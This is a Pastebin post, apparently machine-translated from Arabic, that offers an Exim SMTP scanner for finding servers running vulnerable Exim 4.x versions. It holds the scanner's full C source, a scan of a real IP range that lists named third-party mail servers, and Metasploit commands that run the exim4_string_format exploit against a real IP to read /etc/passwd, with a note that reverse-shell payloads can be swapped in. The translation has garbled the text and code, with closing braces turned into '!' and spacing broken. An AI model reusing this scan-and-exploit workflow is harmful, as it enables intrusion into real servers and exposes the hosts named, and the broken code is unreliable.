Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exim Remote Scanner nood Server
- Peace and mercy of God be upon
- A simple tool that can be known for some Exim Remote Scanner nood Server
- Examination of its servers by the network
- "Abu so-called hyper or when some Nud"
- Of the gap exim stmp
- Code:
- . / Exim_scan-s 80.237.132.33-e 80.237.255.255-t 20-n 50-p 25-l sec4ever.txt
- Exim4 remote Scanner.
- Set highest priority
- Set Max open files to: 1024
- Set Logfile: sec4ever.txt
- Scan start: 31711 hosts, 50 threads ...
- -------------------------------------------------- --------------
- 80.237.141.10 220 srv05.tj-edv.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:17:22 +0100
- 80.237.145.35 220 mail.dalailama-hamburg.de ESMTP exim 4.50 Fri, 24 Dec 2010 12:20:50 +0100
- 80.237.153.41 220-server.event-it-store.de ESMTP exim 4.69 # 1 Fri, 24 Dec 2010 12:26:46 +0100
- 80.237.154.40 220 portabox.local.com ESMTP exim 4.68 Fri, 24 Dec 2010 11:27:01 +0000
- 80.237.154.66 220 mm1.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:27:09 +0100
- 80.237.154.117 220 ds80-237-154-117.dedicated.hosteurope.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:10 +0100
- 80.237.155.85 220 qsmirror01.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
- 80.237.155.86 220 qsmirror02.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
- 80.237.157.25 220 secksie.org ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:54 +0100
- 80.237.157.45 220 server.mfkom.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:59 +0100
- 80.237.157.97 220 de1.coguan.com ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:17 +0100
- 80.237.158.89 220 sester.sidebysite.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:18 +0100
- 80.237.158.37 220 homer.pl ESMTP exim 4.69 Fri, 24 Dec 2010 12:25:40 +0100
- 80.237.158.45 220 mm2.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:19 +0100
- 80.237.159.54 220 jugene.betalounge.com ESMTP exim 4.69 Fri, 24 Dec 2010 12:28:39 +0100
- 80.237.162.171 220 familie-deden.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:49 +0100
- On File
- Code PHP:
- / *
- * For Linux:
- * Gcc-o exim_scan exim_scan.c-O3-Wall-pipe-DLinux-lpthread
- * For FreeBSD:
- * Gcc-o exim_scan exim_scan.c-O3-Wall-pipe-lpthread
- * /
- # Include <stdio.h>
- # Include <unistd.h>
- # Include <stdarg.h>
- # Include <sys/types.h>
- # Include <sys/wait.h>
- # Include <sys/socket.h>
- # Include <netinet/in.h>
- # Include <netinet/tcp.h>
- # Include <sys/resource.h>
- # Include <arpa/inet.h>
- # Include <netdb.h>
- # Include <stdlib.h>
- # Include <errno.h>
- # Include <signal.h>
- # Include <string.h>
- # Include <assert.h>
- # Include <poll.h>
- # Include <fcntl.h>
- # Include <sys/time.h>
- # Include <pthread.h>
- # Include <regex.h>
- # Define TIMEOUT 10
- # Define MAXHOSTS 0x7fffffff
- # Define THREADS 256
- # Ifdef Linux
- / *
- * Normal data may be read.
- * /
- # Define POLLRDNORM 0x040
- # Endif
- /////////////////////////////// .... ///////////////////////////////////////
- static FILE * output = NULL;
- extern int errno;
- static char * start = NULL; / * start host * /
- static char * end = NULL; / * end host * /
- static int port = 25;
- / * Number of IP will be scanned * /
- static int totnum = 0;
- / * Thread id * /
- static pthread_t tid;
- static int inum = 0;
- / * Start time * /
- static time_t t1, t2;
- / * Number of threads * /
- static int thdnum = THREADS;
- / * Current number of threads * /
- static int curnum = 0;
- static int timeout = TIMEOUT;
- / * Mutex lock for 'curnum' * /
- static pthread_mutex_t mutex_curnum = PTHREAD_MUTEX_INITIALIZER;
- / * Cond for curnum * /
- static pthread_cond_t cond_curnum = PTHREAD_COND_INITIALIZER;
- static void terminate (void)
- {
- if (output! = stdout) {
- fclose (output);
- output = stdout;
- !
- _exit (EXIT_SUCCESS);
- !
- static void on_terminate (int signo)
- {
- time_t t2 = time (NULL);
- fprintf (stderr, "--------------------------------------------- ------------------- \ n \ n ");
- fprintf (stderr, "Receive SIG NUM:% d% d /% d hosts,% lu secs,% ld hosts / sec. \ n", signo, inum + 1,
- totnum, t2-t1, (inum +1) / (t2-t1));
- pthread_mutex_destroy (& mutex_curnum);
- pthread_cond_destroy (& cond_curnum);
- exit (EXIT_SUCCESS);
- } / * End of on_terminate * /
- static void on_sigchld (int signo)
- {
- pid_t pid;
- int status;
- while ((pid = waitpid (-1, & status, WNOHANG))> 0) {
- fprintf (stderr, "child <% u> terminated", (unsigned int) pid);
- } / * End of while * /
- return;
- } / * End of on_sigchld * /
- / *
- * .......
- * /
- static void init_signal (void)
- {
- unsigned int i;
- atexit (terminate);
- for (i = 1; i <9; i + +) {
- signal (i, on_terminate);
- !
- signal (SIGTERM, on_terminate);
- signal (SIGALRM, on_terminate);
- signal (SIGCHLD, on_sigchld);
- return;
- } / * End of init_signal * /
- / * New:
- * Tcp connect with no block socket, host to ip.
- * Millisecond timeout, it's will be fast.
- *; D
- * 2003/06/23 add by Sam
- * /
- static int tcpConnect (const char * ip, unsigned int port, unsigned int timeout)
- {
- int sock, flag, pe = 0;
- size_t pe_len;
- fd_set rset;
- struct timeval tv;
- struct sockaddr_in addr;
- sock = socket (AF_INET, SOCK_STREAM, 0);
- if (-1 == sock) {
- perror ("tcpConnect: socket \ n");
- return -1;
- !
- addr.sin_addr.s_addr = inet_addr (ip);
- addr.sin_family = AF_INET;
- addr.sin_port = htons (port);
- flag = fcntl (sock, F_GETFL);
- if (-1 == flag) {
- perror ("tcpConnect: fcntl \ n");
- close (sock);
- return -1;
- !
- flag | = O_NONBLOCK;
- if (fcntl (sock, F_SETFL, flag) <0) {
- perror ("tcpConnect: fcntl \ n");
- close (sock);
- return -1;
- !
- if (connect (sock, (const struct sockaddr *) & addr,
- sizeof (addr)) <0 & &
- errno! = EINPROGRESS) {
- close (sock);
- return -1;
- !
- tv.tv_sec = timeout/1000;
- tv.tv_usec = timeout% 1000;
- FD_ZERO (& rset);
- FD_SET (sock, & rset);
- if (select (sock +1, & rset, & rset, NULL, & tv) <= 0) {
- close (sock);
- return -1;
- !
- pe_len = sizeof (pe);
- if (getsockopt (sock, SOL_SOCKET, SO_ERROR, & pe, & pe_len) <0) {
- perror ("tcpConnect: getsockopt \ n");
- close (sock);
- return -1;
- !
- if (pe! = 0) {
- errno = pe;
- close (sock);
- return -1;
- !
- if (fcntl (sock, F_SETFL, flag & ~ O_NONBLOCK) <0) {
- perror ("tcpConnect: fcntl \ n");
- close (sock);
- return -1;
- !
- pe = 1;
- if (setsockopt (sock, SOL_SOCKET, SO_KEEPALIVE, & pe, pe_len) <0) {
- perror ("tcpConnect: setsockopt \ n");
- close (sock);
- return -1;
- !
- return sock;
- !
- static void check_exim (char * host)
- {
- int sock, retval, i;
- unsigned char buff [1024], resp [512], errbuf [1024];
- struct pollfd fds [1];
- regex_t re;
- regmatch_t subs [10];
- char * pattern = "Exim 4 \ \. [0-6] [0-9]";
- retval = regcomp (& re, pattern, REG_EXTENDED);
- if (retval) {
- regerror (retval, & re, errbuf, sizeof (errbuf));
- / / Printf ("error: regcomp:% s \ n", errbuf);
- goto nonssl_out;
- !
- / *
- * Net connect
- * /
- if ((sock = tcpConnect (host, port, (timeout - timeout / 2) * 1000)) <= 0) {
- retval = 0;
- goto nonssl_out;
- !
- fds [0]. fd = sock;
- fds [0]. events = POLLRDNORM;
- / *
- * Set poll timeout (usec)
- * /
- retval = poll (fds, 1, (timeout - timeout / 2) * 1000);
- if (retval <= 0) {
- goto nonssl_out;
- !
- if (fds [0]. revents & POLLRDNORM) {
- retval = read (sock, resp, sizeof (resp));
- if (retval <= 0) {
- goto nonssl_out;
- !
- for (i = 0; i <retval; i + +) {
- if (resp [i] == '\ r' | | resp [i] == '\ n') {
- resp [i] ='';
- !
- !
- retval = regexec (& re, resp, 10, subs, 0);
- if (retval == REG_NOMATCH) goto nonssl_out;
- else if (retval! = 0) {
- regerror (retval, & re, errbuf, sizeof (errbuf));
- / / Printf ("error: regexec:% s \ n", errbuf);
- goto nonssl_out;
- !
- / / Matched
- if (output! = stdout) {
- fprintf (stderr, "%-40s% s \ n", host, resp); / / also output in console.
- !
- fprintf (output, "%-40s% s \ n", host, resp);
- goto nonssl_out;
- !
- nonssl_out:
- if (sock) {
- close (sock);
- sock = -1;
- !
- regfree (& re);
- return;
- !
- static void * init_scan (void * arg)
- {
- pthread_t thread_id;
- / *
- * There some signal code ripped from scz's code
- * /
- sigset_t signal_mask;
- thread_id = pthread_self ();
- if (0! = sigfillset (& signal_mask)) {
- fprintf (stderr, "sigfillset error in thread [% u] \ n", (unsigned int) thread_id);
- exit (EXIT_FAILURE);
- !
- / *
- * ........
- * /
- if (0! = sigprocmask (SIG_BLOCK, & signal_mask, NULL)) {
- fprintf (stderr, "sigprocmask error in thread [% u] \ n", (unsigned int) thread_id);
- exit (EXIT_FAILURE);
- !
- pthread_detach (thread_id);
- check_exim (arg);
- # If 0
- fprintf (stderr, "% d: scan% s \ n", pthread_self (), arg);
- # Endif
- free (arg);
- pthread_mutex_lock (& mutex_curnum);
- curnum -;
- pthread_cond_broadcast (& cond_curnum);
- pthread_mutex_unlock (& mutex_curnum);
- return NULL;
- !
- / *
- * Print usage messages
- * /
- static void usage (char * s)
- {
- fprintf (stderr, "Usage:% s [-s startip] [-e endip] [-t timeout] [-n maxthreadnum] [-p port: 25] [-l logfile] [-h?] \ n \ n ", s);
- !
- int main (int argc, char * argv [])
- {
- int i;
- struct rlimit rl;
- struct in_addr current_ip; / * current ip * /
- struct in_addr final_ip; / * last ip to scan * /
- char * host, * file = ". / exim.ips";
- fprintf (stderr, "Exim4 Remote Scanner. \ n \ n");
- while ((i = getopt (argc, argv, "h?: s: e: t: n: p: l:"))! = EOF) {
- switch (i) {
- case 's':
- start = strdup (optarg);
- if (! inet_aton (start, & current_ip)) {
- fprintf (stderr, "invalid IP address:% s \ n", start);
- return -1;
- !
- break;
- case 'e':
- end = strdup (optarg);
- if (! inet_aton (end, & final_ip)) {
- fprintf (stderr, "invalid IP address:% s \ n", end);
- return -1;
- !
- break;
- case 't':
- timeout = atoi (optarg);
- break;
- case 'n':
- thdnum = atoi (optarg);
- break;
- case 'p':
- port = atoi (optarg);
- break;
- case 'l':
- file = strdup (optarg);
- break;
- case 'h':
- case '?':
- usage (argv [0]);
- exit (EXIT_FAILURE);
- !
- !
- if (start == NULL & & end == NULL) {
- usage (argv [0]);
- exit (EXIT_FAILURE);
- !
- init_signal ();
- / * Set highest priority * /
- if (! geteuid ()) {
- fprintf (stderr, "Set highest priority \ n");
- setpriority (PRIO_PROCESS, 0, -20);
- !
- / * Raise number of open files * /
- if (! getrlimit (RLIMIT_NOFILE, & rl)) {
- fprintf (stderr, "Set Max open files to:% d \ n", (int) rl.rlim_max);
- rl.rlim_cur = rl.rlim_max;
- setrlimit (RLIMIT_NOFILE, & rl);
- !
- if (thdnum + 10> rl.rlim_cur) {
- thdnum = rl.rlim_cur - 10;
- fprintf (stderr, "Too many threads, set threads number to% d \ n", thdnum);
- !
- totnum = (ntohl (final_ip.s_addr) - ntohl (current_ip.s_addr)) + 1;
- if (totnum> MAXHOSTS) {
- fprintf (stderr, "Too may hosts, MAX hosts:% d \ n", MAXHOSTS);
- exit (EXIT_FAILURE);
- !
- output = stdout;
- if (file! = NULL) {
- fprintf (stderr, "Set Logfile:% s \ n", file);
- if ((output = fopen (file, "w +")) == NULL) {
- fprintf (stderr, "Error in open Logfile% s:% s \ n", file, strerror (errno));
- return (EXIT_FAILURE);
- !
- !
- fprintf (stderr, "Scan start:% d hosts,% d threads ... \ n \ n", totnum, thdnum);
- fprintf (stderr, "--------------------------------------------- ------------------- \ n ");
- t1 = time (NULL);
- for (inum = 0; inum <totnum; inum + +) {
- host = calloc (16, 1);
- if (host == NULL) {
- fprintf (stderr, "No memory left \ n");
- return -1;
- !
- sprintf (host, "% s", inet_ntoa (current_ip));
- current_ip.s_addr = htonl (ntohl (current_ip.s_addr) +1);
- pthread_mutex_lock (& mutex_curnum);
- if (curnum> = thdnum) {
- pthread_cond_wait (& cond_curnum, & mutex_curnum);
- !
- curnum + +;
- pthread_mutex_unlock (& mutex_curnum);
- / *
- * ..........
- * /
- if (pthread_create (& tid, NULL, (void *) init_scan, (void *) host)! = 0) {
- fprintf (stderr, "pthread_create:% s \ n", strerror (errno));
- exit (EXIT_FAILURE);
- !
- !
- pthread_mutex_lock (& mutex_curnum);
- while (curnum> 0) {
- pthread_cond_wait (& cond_curnum, & mutex_curnum);
- !
- pthread_mutex_unlock (& mutex_curnum);
- t2 = time (NULL);
- fprintf (stderr, "--------------------------------------------- ------------------- \ n ");
- fprintf (stderr, "\ nScan completed,% ld sec", t2-t1);
- if (t2 - t1)
- fprintf (stderr, "% ld hosts / sec. \ n", totnum / (t2-t1));
- else
- fprintf (stderr, "\ n");
- pthread_mutex_destroy (& mutex_curnum);
- pthread_cond_destroy (& cond_curnum);
- return (EXIT_SUCCESS);
- !
- As for the exploitation of a loophole
- Code PHP:
- use exploit/unix/smtp/exim4_string_format
- set rhost 80.237.132.33
- set payload cmd / unix / generic
- set CMD 'cat / etc / passwd'
- And you can change Albailoud to the touch and Reverse Albailoudat many Exim Remote Scanner nood Server
- The latter rights reserved for a guest
- Source
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement